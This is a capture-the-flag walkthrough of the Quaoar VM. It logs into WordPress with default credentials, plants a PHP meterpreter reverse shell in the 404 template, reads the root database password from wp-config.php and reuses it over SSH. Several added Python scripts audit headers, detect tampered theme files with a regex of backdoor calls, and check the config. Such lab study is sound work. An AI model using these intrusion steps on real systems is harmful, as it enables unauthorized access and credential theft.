Hackfest2016 Quaoar Walkthrough

Today I took some time to complete a simple CTF from VulnHub called Quaoar. In the links you can find all the info about how to get this CTF VM.

I downloaded the VM file and opened it with VirtualBox. I started with an nmap command, not only to find new machines on my network but also to identify their services:

nmap -sV 192.168.1.0/24

And I found:

Nmap scan report for 192.168.1.37
Host is up (0.040s latency).
Not shown: 991 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
53/tcp  open  domain      ISC BIND 9.8.1-P1
80/tcp  open  http        Apache httpd 2.2.22 ((Ubuntu))
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
993/tcp open  ssl/imap    Dovecot imapd
995/tcp open  ssl/pop3    Dovecot pop3d
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Then, my second step was to check the HTTP server.

[Image: Quaoar Hack The Planet]

I tried downloading both images and extracting their metadata, with no luck.

I continued by taking a closer look at the server with nikto, and this is what I found:

# nikto -host http://192.168.1.37
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.37
+ Target Hostname:    192.168.1.37
+ Target Port:        80
+ Start Time:         2017-03-20 18:33:20 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, inode: 133975, size: 100, mtime: Mon Oct 24 01:00:10 2016
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3
+ Entry '/wordpress/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ /wordpress/: A Wordpress installation was found.
+ 8348 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2017-03-20 18:34:08 (GMT-3) (48 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
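Several of the Nikto findings above come from a single response header set: the three missing defensive headers, the Server and X-Powered-By version strings, and the ETag that leaks the inode. The script below is an added example for this walkthrough, not code from the original post. The header values are constructed to match what Nikto reported; the ETag is built in Apache's default INode MTime Size layout (hex fields in the order inode-size-mtime) from the inode 133975 = 0x20b57 and size 100 = 0x64 that Nikto printed, with a made-up mtime field.

```python
"""Audit a set of HTTP response headers for the weaknesses Nikto flagged.

Added example for this walkthrough (not part of the original post).
The SAMPLE_* header sets below are constructed, not captured from the VM.
"""
from typing import Dict, List, Optional, Tuple

# Defensive headers whose absence Nikto reports, with a short reason.
EXPECTED_HEADERS = {
    "x-frame-options": "anti-clickjacking protection missing",
    "x-content-type-options": "MIME sniffing not disabled",
    "x-xss-protection": "legacy XSS filter hint not set",
}

# Headers that commonly disclose software versions.
VERSION_HEADERS = ("server", "x-powered-by")


def parse_apache_etag(etag: str) -> Optional[Tuple[int, int, int]]:
    """Decode an Apache ETag in the default INode MTime Size layout.

    Apache emits the fields as lower-case hex, ordered inode-size-mtime.
    Returns (inode, size, mtime) or None when the value has another shape
    (for example "size-mtime" once FileETag MTime Size is configured).
    """
    value = etag.strip()
    if value.startswith("W/"):          # weak validator prefix
        value = value[2:]
    value = value.strip('"')
    parts = value.split("-")
    if len(parts) != 3:
        return None
    try:
        inode, size, mtime = (int(p, 16) for p in parts)
    except ValueError:
        return None
    return inode, size, mtime


def audit_headers(headers: Dict[str, str]) -> List[str]:
    """Return one human-readable finding per weakness found in `headers`."""
    h = {name.lower(): value for name, value in headers.items()}
    findings: List[str] = []

    for name, reason in EXPECTED_HEADERS.items():
        if name not in h:
            findings.append(f"missing {name}: {reason}")

    for name in VERSION_HEADERS:
        if name in h and any(ch.isdigit() for ch in h[name]):
            findings.append(f"{name} discloses a version: {h[name]}")

    if "etag" in h:
        decoded = parse_apache_etag(h["etag"])
        if decoded is not None:
            inode, size, _mtime = decoded
            findings.append(f"etag leaks inode {inode} and size {size}")

    return findings


# Constructed to mirror the Nikto output: inode 133975 = 0x20b57,
# size 100 = 0x64; the mtime field is an arbitrary placeholder.
SAMPLE_WEAK_HEADERS = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10-1ubuntu3",
    "ETag": '"20b57-64-53f8c5f9b1a80"',
    "Content-Type": "text/html",
}

# The same server after the usual fixes: ServerTokens Prod, expose_php off,
# FileETag MTime Size, and the three defensive headers added.
SAMPLE_HARDENED_HEADERS = {
    "Server": "Apache",
    "ETag": '"64-53f8c5f9b1a80"',
    "Content-Type": "text/html",
    "X-Frame-Options": "SAMEORIGIN",
    "X-Content-Type-Options": "nosniff",
    "X-XSS-Protection": "0",
}

if __name__ == "__main__":
    for label, hdrs in (("weak", SAMPLE_WEAK_HEADERS), ("hardened", SAMPLE_HARDENED_HEADERS)):
        print(f"[{label}]")
        for finding in audit_headers(hdrs) or ["no findings"]:
            print("  -", finding)
```

Run against a real server by filling the dict from `requests.head(url).headers` or a curl -I capture; the ETag decoder is the part worth keeping, since it turns the abstract "leaks inodes" finding into the concrete number an attacker would read.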

First I tried hitting http://192.168.1.37/icons/README, with no luck: a plain text file with no apparent value popped out.

Then I tried the ever popular wordpress directory. Yes! We have a running installation, and it also seems to be the default one!

[Image: Wordpress install]

We all know the wp-admin folder! Let's just try admin/admin. Whoooaaa, I was in!

[Image: Wordpress default passwords]

Ok, now that I have access to the WordPress file manager, I can just drop a meterpreter payload in there and get a reverse shell.

I created a PHP file with the meterpreter payload as shown in the following image:

[Image: Meterpreter]

Then I added the shell code to the 404 page using the WordPress theme editor.

[Image: Editor]

I started msfconsole and set up the listener. Once that was done, I just forced a 404 error on WordPress by fetching a non-existent post id.

msf > use exploit/multi/handler 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:4444 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.37
[*] Meterpreter session 1 opened (192.168.1.38:4444 -> 192.168.1.37:40345) at 2017-03-20 19:12:40 -0300

meterpreter > sysinfo
Computer    : Quaoar
OS          : Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686
Meterpreter : php/linux
meterpreter > pwd
/var/www/wordpress
meterpreter > ls
Listing: /var/www/wordpress
===========================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100644/rw-r--r--  418    fil   2016-10-26 21:45:26 -0300  index.php
100644/rw-r--r--  19930  fil   2016-10-26 21:45:26 -0300  license.txt
100644/rw-r--r--  7195   fil   2016-10-26 21:45:26 -0300  readme.html
100644/rw-r--r--  4896   fil   2016-10-26 21:45:26 -0300  wp-activate.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-admin
100644/rw-r--r--  271    fil   2016-10-26 21:45:26 -0300  wp-blog-header.php
100644/rw-r--r--  4818   fil   2016-10-26 21:45:26 -0300  wp-comments-post.php
100644/rw-r--r--  3087   fil   2016-10-26 21:45:26 -0300  wp-config-sample.php
100666/rw-rw-rw-  3441   fil   2016-11-30 02:02:01 -0300  wp-config.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-content
100644/rw-r--r--  2932   fil   2016-10-26 21:45:26 -0300  wp-cron.php
40755/rwxr-xr-x   4096   dir   2016-10-26 21:45:26 -0300  wp-includes
100644/rw-r--r--  2380   fil   2016-10-26 21:45:26 -0300  wp-links-opml.php
100644/rw-r--r--  2359   fil   2016-10-26 21:45:26 -0300  wp-load.php
100644/rw-r--r--  33609  fil   2016-10-26 21:45:26 -0300  wp-login.php
100644/rw-r--r--  8235   fil   2016-10-26 21:45:26 -0300  wp-mail.php
100644/rw-r--r--  11070  fil   2016-10-26 21:45:26 -0300  wp-settings.php
100644/rw-r--r--  25665  fil   2016-10-26 21:45:26 -0300  wp-signup.php
100644/rw-r--r--  4026   fil   2016-10-26 21:45:26 -0300  wp-trackback.php
100644/rw-r--r--  3032   fil   2016-10-26 21:45:26 -0300  xmlrpc.php
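The theme editor step above leaves a trace a defender can look for: a template file whose hash no longer matches the shipped theme, and PHP that calls eval() or a decoder inside a page template. The script below is an added example, not code from the original post or from WordPress itself; it compares an in-memory theme tree (the file contents are constructed stand-ins) against a SHA-256 baseline taken from a clean copy and also scans each file for function calls that rarely belong in a template.

```python
"""Detect tampered WordPress theme files by hash baseline plus content scan.

Added example for this walkthrough (not part of the original post). The
theme tree is an in-memory dict of constructed file contents; in practice
the baseline would be computed from a clean copy of the same theme version.
"""
import hashlib
import re
from typing import Dict, List

# PHP calls that rarely belong in a theme template and are typical of
# droppers and backdoors. A match is a heuristic to review, not a verdict.
SUSPICIOUS_CALLS = re.compile(
    r"\b(eval|assert|system|exec|shell_exec|passthru|base64_decode|gzinflate)\s*\(",
    re.IGNORECASE,
)


def hash_tree(files: Dict[str, str]) -> Dict[str, str]:
    """Map each path to the SHA-256 hex digest of its content."""
    return {path: hashlib.sha256(content.encode()).hexdigest() for path, content in files.items()}


def audit_theme(baseline: Dict[str, str], current: Dict[str, str]) -> List[str]:
    """Compare a current theme tree against a known-good hash baseline.

    `baseline` maps path -> sha256 hex digest of the clean file.
    `current` maps path -> present content. Returns sorted finding strings.
    """
    findings: List[str] = []
    current_hashes = hash_tree(current)

    for path, digest in current_hashes.items():
        if path not in baseline:
            findings.append(f"unexpected file: {path}")
        elif baseline[path] != digest:
            findings.append(f"modified file: {path}")

    for path in baseline:
        if path not in current:
            findings.append(f"missing file: {path}")

    for path, content in current.items():
        for match in SUSPICIOUS_CALLS.finditer(content):
            findings.append(f"suspicious call {match.group(1)}() in {path}")

    return sorted(findings)


# Constructed clean theme: trimmed stand-ins for the real template files.
CLEAN_THEME = {
    "404.php": "<?php get_header(); ?>\n<h1>Not Found</h1>\n<?php get_footer(); ?>\n",
    "index.php": "<?php get_header(); the_post(); the_content(); get_footer(); ?>\n",
    "functions.php": "<?php add_theme_support('title-tag'); ?>\n",
}
BASELINE = hash_tree(CLEAN_THEME)

# The same tree after an editor-based tamper: 404.php gained an eval() call
# (the payload text is a constructed placeholder) and a stray file appeared.
TAMPERED_THEME = dict(CLEAN_THEME)
TAMPERED_THEME["404.php"] = (
    "<?php eval(base64_decode('PAYLOAD_PLACEHOLDER')); ?>\n" + CLEAN_THEME["404.php"]
)
TAMPERED_THEME["cache.php"] = "<?php // constructed stray file dropped next to the theme ?>\n"

if __name__ == "__main__":
    for finding in audit_theme(BASELINE, TAMPERED_THEME):
        print("-", finding)
```

On a real install the same comparison can be done against the theme's upstream zip, and the file modification times in the listing above (every file dated 2016-10-26 except wp-config.php) show why a timestamp check alone is not enough: an editor write leaves a fresh mtime, but so does any legitimate update.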

I got a shell on the server; the only problem was that I was running as the web server process with almost no privileges. I did a cat wp-config.php to see if there were any DB credentials that could help, and I found:

/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
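Two things in this wp-config.php deserve attention beyond the credentials themselves: the meterpreter listing showed the file as mode 100666 (readable and writable by everyone), and the site connects to MySQL as root. The script below is an added example, not the author's or WordPress's own code. It parses the define() lines of a constructed wp-config.php fragment (the weak sample reuses the two lines shown above and the mode from the listing), flags those two issues, and also checks for the DISALLOW_FILE_EDIT constant, which would have removed the theme editor used earlier; the hardened sample's account name and password are placeholders.

```python
"""Audit a wp-config.php for risky settings and file permissions.

Added example for this walkthrough (not part of the original post). The
SAMPLE_* texts are constructed fragments; the weak one reuses the two
define() lines shown in the walkthrough and the mode from the listing.
"""
import re
import stat
from typing import Dict, List, Union

# Matches define('NAME', 'string') and define('NAME', true|false).
DEFINE_RE = re.compile(
    r"define\(\s*'([A-Za-z_]+)'\s*,\s*(?:'([^']*)'|(true|false))\s*\)", re.IGNORECASE
)


def parse_defines(text: str) -> Dict[str, Union[str, bool]]:
    """Extract constants from wp-config.php text (string and boolean forms only)."""
    defines: Dict[str, Union[str, bool]] = {}
    for match in DEFINE_RE.finditer(text):
        name, string_value, bool_value = match.groups()
        if string_value is not None:
            defines[name] = string_value
        else:
            defines[name] = bool_value.lower() == "true"
    return defines


def audit_wp_config(text: str, mode: int) -> List[str]:
    """Return findings for a wp-config.php given its text and its st_mode value."""
    findings: List[str] = []
    perm = stat.S_IMODE(mode)
    if perm & stat.S_IWOTH:
        findings.append(f"wp-config.php is world-writable (mode {perm:o})")
    if perm & stat.S_IROTH:
        findings.append(f"wp-config.php is world-readable (mode {perm:o})")

    defines = parse_defines(text)
    if defines.get("DB_USER") == "root":
        findings.append("DB_USER is root: the site has full privileges over every database")
    if not defines.get("DB_PASSWORD"):
        findings.append("DB_PASSWORD is empty or missing")
    if defines.get("DISALLOW_FILE_EDIT") is not True:
        findings.append("DISALLOW_FILE_EDIT is not true: the theme and plugin editors stay enabled")
    return findings


# Weak sample: the two define() lines from the walkthrough.
SAMPLE_WEAK_CONFIG = """<?php
/** MySQL database username */
define('DB_USER', 'root');

/** MySQL database password */
define('DB_PASSWORD', 'rootpassword!');
"""
SAMPLE_WEAK_MODE = 0o100666   # from the meterpreter listing: 100666/rw-rw-rw-

# Hardened sample: a dedicated least-privilege account (constructed name and
# placeholder password) and the editor disabled; file readable only by owner/group.
SAMPLE_HARDENED_CONFIG = """<?php
define('DB_USER', 'wp_quaoar');
define('DB_PASSWORD', 'CONSTRUCTED_PLACEHOLDER');
define('DISALLOW_FILE_EDIT', true);
"""
SAMPLE_HARDENED_MODE = 0o100640

if __name__ == "__main__":
    for label, cfg, mode in (
        ("weak", SAMPLE_WEAK_CONFIG, SAMPLE_WEAK_MODE),
        ("hardened", SAMPLE_HARDENED_CONFIG, SAMPLE_HARDENED_MODE),
    ):
        print(f"[{label}]")
        for finding in audit_wp_config(cfg, mode) or ["no findings"]:
            print("  -", finding)
```

On a live box the mode comes from `os.stat('/var/www/wordpress/wp-config.php').st_mode`; the parser deliberately ignores anything but quoted strings and bare booleans, so a define() built from an expression is simply not reported rather than misread.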

Sooooo, let's remember that port 22 was open! I'll try to ssh in with those credentials.

Bingo! I'm in as root!

[Image: Getting root access]

So I've completed 2 of the 3 flags for this VM; I just need to find which is the post-exploitation vulnerability.

A detailed listing of root's home directory turned up a flag:

[Image: Getting root access]

I searched for the flag but no info was leaked (at least not by trying a reverse search on crackstation).

Then, by looking at the .lesshst file, I got an idea: search the entire filesystem for flag.txt files!

[Image: Searching for flags clue]

Found 2 flags in total. None of them leaked info on crackstation.

[Image: Global search]

I went ahead and looked for more in the home directory, but that was all.

[Image: home directory]

To be honest, I'm not sure if there is something more to take advantage of, maybe WordPress user credentials?

But by getting root access and finding another unexpected flag I feel like this CTF is complete!